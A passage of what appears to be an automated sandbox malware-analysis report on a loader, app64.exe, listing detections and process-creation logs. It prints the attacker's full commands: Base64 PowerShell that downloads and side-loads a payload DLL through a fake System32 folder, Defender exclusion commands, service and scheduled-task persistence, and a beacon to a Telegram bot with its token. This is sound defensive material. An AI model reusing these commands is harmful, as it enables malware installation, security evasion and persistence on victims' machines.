Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF111180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF7DF111180
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF11B2E0 SetUnhandledExceptionFilter, 0_2_00007FF7DF11B2E0
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF115349 SetUnhandledExceptionFilter, 0_2_00007FF7DF115349
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00007FF67A0E1B5C
Source: C:\Windows \System32\printui.exe Code function: 10_2_00007FF67A0E1880 SetUnhandledExceptionFilter, 10_2_00007FF67A0E1880
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E1B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FF67A0E1B5C
Source: C:\Windows \System32\printui.exe Code function: 13_2_00007FF67A0E1880 SetUnhandledExceptionFilter, 13_2_00007FF67A0E1880
Source: C:\Windows\System32\svchost.exe Code function: 28_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_64947650
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 28_2_6828C940
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7FA0C08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00007FF8A7FA0C08
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A7F92CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8A7F92CA0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8A935EE70
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A935FA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00007FF8A935FA50
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00007FF8B83C9E30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713DE40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_00007FF74713DE40
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74714AE5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00007FF74714AE5C
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 34_2_00007FF8B83C9E30
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83CA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00007FF8B83CA8B4

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell decode and execute
Source: Yara match File source: amsi64_2124.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6620.amsi.csv, type: OTHER
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_2124.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR
Adds a directory exclusion to Windows Defender
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\app64.exe NtCreateUserProcess: Direct from: 0x7FF7DF113E4F Jump to behavior
Source: C:\Users\user\Desktop\app64.exe NtQuerySystemInformation: Direct from: 0x7FF7DF113E73 Jump to behavior
Source: C:\Users\user\Desktop\app64.exe NtClose: Direct from: 0x7FF7DF113E43
Source: C:\Users\user\Desktop\app64.exe NtDelayExecution: Direct from: 0x7FF7DF113E67 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x590769 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769 Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp, 28_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort, 28_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA, 28_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 28_2_00007FF8A7FB0348
Source: C:\Windows\System32\console_zero.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID, 34_2_00007FF747151B38
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,GetLocaleInfoW, 34_2_00007FF7471517D0
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesEx, 34_2_00007FF747151700
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW, 34_2_00007FF74715145C
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,FormatMessageA, 34_2_00007FF74713C254
Queries the volume information (name, serial number etc) of a device
